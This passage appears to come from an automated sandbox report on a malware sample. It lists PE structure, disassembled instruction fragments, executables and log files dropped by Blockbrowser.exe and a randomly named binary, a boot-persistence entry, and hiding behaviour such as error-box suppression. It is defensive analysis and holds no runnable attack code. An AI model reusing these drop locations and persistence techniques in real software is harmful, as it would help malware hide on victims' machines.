                                    Source: Ccp3sJPDXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: Ccp3sJPDXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: Ccp3sJPDXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: Ccp3sJPDXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: Ccp3sJPDXs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeFile created: C:\SavesHost\__tmp_rar_sfx_access_check_5368593Jump to behavior
                                    Source: Ccp3sJPDXs.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EF640 push ecx; ret 0_2_007EF653
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EEB78 push eax; ret 0_2_007EEB96
                                    Source: C:\SavesHost\Blockbrowser.exeCode function: 5_2_00007FF848D008E8 push FFFFFFE9h; ret 5_2_00007FF848D00909
                                    Source: C:\SavesHost\Blockbrowser.exeCode function: 5_2_00007FF8490C7967 push ebx; retf 5_2_00007FF8490C796A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848BDD2A5 pushad ; iretd 8_2_00007FF848BDD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848CFC445 push ebx; retf 8_2_00007FF848CFC44A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848DC2316 push 8B485F92h; iretd 8_2_00007FF848DC231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848BCD2A5 pushad ; iretd 9_2_00007FF848BCD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848DB2316 push 8B485F93h; iretd 9_2_00007FF848DB231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848BDD2A5 pushad ; iretd 11_2_00007FF848BDD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848CFAA97 push esp; retf 11_2_00007FF848CFAA98
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848CF08BD push E958ED1Ch; ret 11_2_00007FF848CF0909
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848DC2316 push 8B485F92h; iretd 11_2_00007FF848DC231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848BCD2A5 pushad ; iretd 13_2_00007FF848BCD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848CEC445 push ebx; retf 13_2_00007FF848CEC44A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848DB9FF1 push esi; retf 13_2_00007FF848DBA07A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848DB2316 push 8B485F93h; iretd 13_2_00007FF848DB231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848DBA073 push esi; retf 13_2_00007FF848DBA07A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF848BED2A5 pushad ; iretd 15_2_00007FF848BED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF848D0C445 push ebx; retf 15_2_00007FF848D0C44A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF848DD2316 push 8B485F91h; iretd 15_2_00007FF848DD231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848BBD2A5 pushad ; iretd 17_2_00007FF848BBD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848CD2325 push eax; iretd 17_2_00007FF848CD233D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848CD08BD push eax; ret 17_2_00007FF848CD087D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848CD089D push eax; ret 17_2_00007FF848CD087D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848CD0855 push eax; ret 17_2_00007FF848CD087D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848CDC445 push ebx; retf 17_2_00007FF848CDC44A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF848DA2316 push 8B485F94h; iretd 17_2_00007FF848DA231B
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeCode function: 25_2_00007FF848CD08E8 push FFFFFFE9h; ret 25_2_00007FF848CD0909
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeCode function: 25_2_00007FF849097967 push ebx; retf 25_2_00007FF84909796A
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\xJfQbpmT.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\UQJnCrwb.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\YYGwXJrX.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\Public\Documents\0ZuAkTjxKX.exeJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\NzeXyGEM.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\SnwWbCTA.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\lpgkkzWs.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\ZI0Zcb1pDT.exeJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\KxrpdWzR.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\LipXSOru.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\lxQDOiwy.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\ezcDmTCJ.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\sCWCXWYE.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\hHZMHlwF.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\lgJkAMCv.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\TcFfQdBd.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\JRXzWseY.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\XnIOiRzu.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\unCSekjx.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\UgLFMzEy.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exeJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\OvRyOCaQ.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\SavesHost\SgrmBroker.exeJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\JulPgBvw.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\uaYsybMf.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\apvwEADp.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\wdLbULQa.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\ouZtCEeJ.logJump to dropped file
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeFile created: C:\SavesHost\Blockbrowser.exeJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\ziDjmQZr.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\eOeVwbKg.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\bGNUAWQL.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\IxKHLBgB.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\slPjJBeC.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\bdzEpOzn.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\OwFfUGTH.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\ZEamenMP.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\bVPmLfYi.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\Opngnglp.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\ZI0Zcb1pDT.exeJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\lxQDOiwy.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\ZEamenMP.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\IxKHLBgB.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\xJfQbpmT.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\hHZMHlwF.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\YYGwXJrX.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\Opngnglp.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\wdLbULQa.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\lpgkkzWs.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\bGNUAWQL.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\lgJkAMCv.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\ezcDmTCJ.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\UQJnCrwb.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\LipXSOru.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\uaYsybMf.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\TcFfQdBd.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\Desktop\JulPgBvw.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\OwFfUGTH.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\OvRyOCaQ.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\eOeVwbKg.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\UgLFMzEy.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\KxrpdWzR.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\slPjJBeC.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\bdzEpOzn.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\JRXzWseY.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\ziDjmQZr.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\ouZtCEeJ.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\XnIOiRzu.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\NzeXyGEM.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\unCSekjx.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\bVPmLfYi.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\SnwWbCTA.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\sCWCXWYE.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile created: C:\Users\user\Desktop\apvwEADp.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Source: C:\SavesHost\Blockbrowser.exeFile created: C:\Users\user\ZI0Zcb1pDT.exeJump to dropped file

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
